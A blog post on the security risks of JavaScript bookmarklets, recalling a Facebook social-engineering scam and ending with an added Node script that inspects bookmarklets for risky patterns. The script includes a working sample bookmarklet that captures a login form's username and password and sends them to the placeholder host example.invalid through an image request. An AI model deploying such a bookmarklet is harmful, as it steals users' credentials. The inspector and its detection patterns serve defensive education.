
I am a big fan of bookmarklets. (A bookmarklet is a short piece of JavaScript code embedded in a web address (URL) that starts with javascript: and is saved as a bookmark or, in Internet Explorer (IE), a favorite.) Bookmarklets work because a browser can run JavaScript entered in its address/URL bar. Go ahead and try it.

In your address bar type:

and press the enter key.

If it didn't work, you are probably running Firefox, or another browser that does not allow javascript: URLs in the address bar. This was done to prevent a social engineering attack that was being seen on Facebook. Facebook users were shown a post asking them to become a "Fan to see the truth"; when they clicked it they were shown some obfuscated JavaScript code and told to copy and paste it into the address bar of their browser. The code they pasted in read the user's Facebook contacts and sent invitations to all of them.

So, to prevent the kind of social engineering attack where users are fooled into copying and pasting JavaScript into the address bar, Firefox and Opera flat out block JavaScript in the address bar. Other browsers block the copy/paste and make you type it all in, on the assumption that the attack code would be too long and too strange to type by hand. Here is an example:

javascript

Nobody would try to type that in!

Of course, if you were really good at social engineering, you might convince or show the victim how to copy and paste the code into the browser’s JavaScript console window.

But if you can social engineer someone to copy and paste malicious code into the address bar, couldn’t you just as easily social engineer them to drag a bookmarklet from a web page to their favorites or bookmark bar and click it?

Below is an example of a simple bookmarklet that contains the script javascript:alert("hi"). Drag the button below to your bookmark (or favorites) bar and then click the bookmarklet.


You may have seen a warning message when you did that. Newer versions of IE and Opera warn you when you drag and drop a bookmarklet onto the favorites bar. Other browsers don't.

So while browsers block you from typing or pasting a javascript: URL into the address bar, they do nothing to stop you from saving the very same code as a bookmarklet and clicking it.

Returning to the Facebook example above: Facebook does not let you add a bookmarklet to a Facebook post. Instead, the attacker would create a post linking to a page that hosts the bookmarklet. The post would tell the victim to visit the page, the page would hook them with an offer, tell them to drag and drop the bookmarklet onto the bookmark bar, and then tell them to return to Facebook and click the bookmarklet to win some fabulous prize.

What could a malicious bookmarklet do? If it was well written, it would do something genuinely useful so that you would keep using it while it worked its evil behind the scenes. (Did you drag the "hi" bookmarklet to your bookmark bar? Don't panic!)

For example, it could check the page you are on when you click it for forms with password fields. If it finds one, it waits until the form is submitted, collects the username and password, and sends them to a third-party server by appending them to the query string of an image request. This is the tracking-pixel technique Google Analytics uses, and because it looks like an ordinary image load, nothing visible happens on the page. Note that the bookmarklet runs with the privileges of whatever page it is clicked on, so the browser's same-origin policy does not help here: the script can read anything that page's own JavaScript can read.

What does this all mean for users? Should they stop using bookmarklets? As I said at the beginning, I am a fan of bookmarklets, and I don't want to see them blocked. They can be extremely useful. But users need to be aware of the potential dangers. They should only save bookmarklets from sites they trust. As with any download (be it a bookmarklet or a program), be cautious and make sure you are getting it from the actual site and not a phished site (one that looks authentic) or a third-party site that purports to offer the same bookmarklet.

I think that IE now has it right. Whenever you drag a bookmarklet to the bookmark/favorites bar you should see a warning.

IE bookmarklet warning

I would go further and add another button, for more advanced users, that lets you see what the JavaScript code actually is. But in the end it is the user's responsibility to protect themselves. As Ralph Waldo Emerson said:

“Knowledge comes by eyes always open and working hands;
and there is no knowledge that is not power.”
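As an added example, not code from the original post, here is what the "show me the code" button proposed above could do, applied to the kind of credential-grabbing bookmarklet described earlier. It decodes the script carried by a javascript: URL, lists the hostnames the script talks to, and flags patterns a user would want to know about before installing it. The two sample bookmarklets, the pattern list, and the hostname example.invalid are all constructed for this example; the benign sample is the post's own alert("hi") and the second implements the form-watching, image-beacon exfiltration the post describes, so the inspector can be seen catching it.

```javascript
// Added example (not from the original post): decode a bookmarklet's URL and
// report what the script inside it does before it goes on the bookmark bar.
// The pattern list and the sample bookmarklets are this example's own.

// Constructed samples, written as they would sit in a bookmark's URL field.
// The second one is the credential grabber the post describes: it watches a
// form with a password field and, on submit, leaks the values through the
// query string of an image request to a constructed host (example.invalid).
const SAMPLES = {
  benign: "javascript:alert('hi')",
  formGrabber:
    "javascript:(function(){var p=document.querySelector('input[type=password]');" +
    "if(!p)return;p.form.addEventListener('submit',function(){" +
    "var u=p.form.querySelector('input[type=text],input[type=email]');" +
    "new Image().src='https://example.invalid/t.gif?u='+" +
    "encodeURIComponent(u?u.value:'')+'%26p='+encodeURIComponent(p.value)})})()",
};

// What a reader would want flagged. Each regex is a rough indicator, not a
// proof of malice; its job is to put the right question in front of the user.
const SIGNS = [
  { id: "password-field", re: /type\s*=\s*['"]?password/i, why: "touches password fields" },
  { id: "submit-hook", re: /onsubmit|['"]submit['"]/i, why: "waits for a form to be submitted" },
  { id: "image-beacon", re: /new\s+Image\s*\(|\.src\s*=\s*['"]?https?:/i, why: "sends data out through an image request" },
  { id: "network", re: /XMLHttpRequest|\bfetch\s*\(|sendBeacon/i, why: "makes network requests" },
  { id: "cookie", re: /document\.cookie/i, why: "reads cookies" },
  { id: "hidden-code", re: /\beval\s*\(|String\.fromCharCode|\bunescape\s*\(|\batob\s*\(/i, why: "decodes or evaluates code at run time" },
];

// Returns the JavaScript source carried by a javascript: URL, or null when the
// URL is not a bookmarklet. Bookmarks often store the script percent-encoded,
// so it is percent-decoded when that succeeds and shown raw otherwise.
function decodeBookmarklet(url) {
  const m = /^\s*javascript:/i.exec(url);
  if (!m) return null;
  const raw = url.slice(m[0].length);
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw; // a stray '%' that is not an escape sequence
  }
}

// Hostnames named in absolute URLs inside the script: where leaked data goes.
function externalHosts(script) {
  const hosts = new Set();
  for (const m of script.match(/https?:\/\/[^\s'"()]+/gi) || []) {
    try { hosts.add(new URL(m).hostname); } catch (e) { /* not a parseable URL */ }
  }
  return [...hosts].sort();
}

// Inspection report for one bookmarklet URL.
function inspectBookmarklet(url) {
  const script = decodeBookmarklet(url);
  if (script === null) return { isBookmarklet: false, script: null, findings: [], hosts: [] };
  const findings = SIGNS.filter((s) => s.re.test(script)).map(({ id, why }) => ({ id, why }));
  return { isBookmarklet: true, script, findings, hosts: externalHosts(script) };
}

// The text a "show me the code" button would display.
function describe(url) {
  const r = inspectBookmarklet(url);
  if (!r.isBookmarklet) return "Not a bookmarklet (no javascript: prefix).";
  const lines = ["Script:", r.script, ""];
  lines.push(r.findings.length ? "This bookmarklet:" : "No risky patterns found.");
  for (const f of r.findings) lines.push(`  - ${f.why} [${f.id}]`);
  if (r.hosts.length) lines.push(`Talks to: ${r.hosts.join(", ")}`);
  return lines.join("\n");
}

for (const [name, url] of Object.entries(SAMPLES)) {
  console.log(`== ${name} ==\n${describe(url)}\n`);
}
```

Run with Node: the benign sample reports no risky patterns, while the form grabber is flagged for touching password fields, hooking form submission and sending data out through an image request, with example.invalid listed as the destination. The regexes are deliberately loose; a real inspector would still show the decoded script in full, since any pattern list can be evaded by obfuscation, which is itself one of the flags.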